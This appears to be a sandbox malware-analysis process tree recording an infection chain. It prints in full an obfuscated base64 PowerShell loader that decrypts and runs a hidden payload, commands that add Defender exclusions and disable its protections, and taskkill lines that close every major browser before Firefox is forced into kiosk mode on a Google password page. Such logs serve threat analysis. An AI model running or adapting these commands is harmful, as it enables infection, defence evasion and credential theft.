                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                  8⤵
                                                  • Blocklisted process makes network request
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops startup file
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: AddClipboardFormatListener
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5024
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                    9⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5916
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "cmd" /K CHCP 437
                                                    9⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5664
                                                    • C:\Windows\SysWOW64\chcp.com
                                                      CHCP 437
                                                      10⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:3528
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -Command "Add-MpPreference -ExclusionPath 'C:'"
                                                      10⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3808
                                            • C:\Users\Admin\AppData\Local\Temp\10369560101\113b44d6e9.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10369560101\113b44d6e9.exe"
                                              6⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:4692
                                            • C:\Users\Admin\AppData\Local\Temp\10369570101\6a21917cb1.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10369570101\6a21917cb1.exe"
                                              6⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:6016
                                            • C:\Users\Admin\AppData\Local\Temp\10369580101\7096b1349e.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10369580101\7096b1349e.exe"
                                              6⤵
                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                              • Checks BIOS information in registry
                                              • Executes dropped EXE
                                              • Identifies Wine through registry keys
                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                              • System Location Discovery: System Language Discovery
                                              PID:4360
                                            • C:\Users\Admin\AppData\Local\Temp\10369590101\45fe7ead25.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10369590101\45fe7ead25.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of FindShellTrayWindow
                                              • Suspicious use of SendNotifyMessage
                                              PID:1752
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM firefox.exe /T
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1128
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM chrome.exe /T
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2684
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM msedge.exe /T
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4028
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM opera.exe /T
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2816
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /F /IM brave.exe /T
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                • Kills process with taskkill
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2124
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                7⤵
                                                  PID:4492
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                    8⤵
                                                    • Drops desktop.ini file(s)
                                                    • Checks processor information in registry
                                                    • Modifies registry class
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    • Suspicious use of SetWindowsHookEx
                                                    PID:1204
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2004 -prefsLen 27099 -prefMapHandle 2008 -prefMapSize 270279 -ipcHandle 2092 -initialChannelId {f88f6e8a-c9b6-45bc-94b0-5740e2e0a201} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                      9⤵
                                                        PID:4988
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {1cc105ed-82c0-42ed-b4ce-28ce465904ee} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                        9⤵
                                                          PID:4980
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3816 -prefsLen 25164 -prefMapHandle 3820 -prefMapSize 270279 -jsInitHandle 3824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3832 -initialChannelId {ac6bd615-5e14-4eb7-8098-45012c683a77} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                          9⤵
                                                          • Checks processor information in registry
                                                          PID:3408
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3980 -prefsLen 27276 -prefMapHandle 3984 -prefMapSize 270279 -ipcHandle 4068 -initialChannelId {65f20bff-f1d2-4073-8d76-667e932686c1} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                          9⤵
                                                            PID:1436
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4548 -prefsLen 34775 -prefMapHandle 4564 -prefMapSize 270279 -jsInitHandle 4568 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4576 -initialChannelId {70a00784-1ddd-4f02-9bd0-e1c86dc59c3b} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                            9⤵
                                                            • Checks processor information in registry
                                                            PID:2116
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5036 -prefsLen 35012 -prefMapHandle 5032 -prefMapSize 270279 -ipcHandle 5028 -initialChannelId {26c6330f-846a-445e-9937-bc1ee07bada8} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                            9⤵
                                                            • Checks processor information in registry
                                                            PID:6292
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5288 -prefsLen 32952 -prefMapHandle 5292 -prefMapSize 270279 -jsInitHandle 5296 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5304 -initialChannelId {7a0e65d0-c0eb-4c6e-8012-76c1fbf4a84e} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                            9⤵
                                                            • Checks processor information in registry
                                                            PID:6444
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5312 -prefsLen 32952 -prefMapHandle 5468 -prefMapSize 270279 -jsInitHandle 5480 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5492 -initialChannelId {a7f1602c-b3d7-43a1-a55c-9b9a878d002d} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                            9⤵
                                                            • Checks processor information in registry
                                                            PID:6480
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5676 -prefsLen 32952 -prefMapHandle 5680 -prefMapSize 270279 -jsInitHandle 5684 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5692 -initialChannelId {9393eef0-1ece-4c61-b22b-0133abe258da} -parentPid 1204 -crashReporter "\\.\pipe\gecko-crash-server-pipe.1204" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                            9⤵
                                                            • Checks processor information in registry
                                                            PID:6508
                                                    • C:\Users\Admin\AppData\Local\Temp\10369600101\92eff99306.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10369600101\92eff99306.exe"
                                                      6⤵
                                                      • Modifies Windows Defender DisableAntiSpyware settings
                                                      • Modifies Windows Defender Real-time Protection settings
                                                      • Modifies Windows Defender TamperProtection settings
                                                      • Modifies Windows Defender notification settings
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Windows security modification
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:6632
                                                    • C:\Users\Admin\AppData\Local\Temp\10369610101\5cf0a9b56c.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10369610101\5cf0a9b56c.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      PID:6136
                                                      • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10369610101\5cf0a9b56c.exe"
                                                        7⤵
                                                        • Downloads MZ/PE file
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3796
                                                    • C:\Users\Admin\AppData\Local\Temp\10369620101\57dbff855a.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10369620101\57dbff855a.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious use of SetThreadContext
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4648
                                                      • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10369620101\57dbff855a.exe"
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        PID:3788
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
                                                      6⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:4628
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
                                                        7⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:6896
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q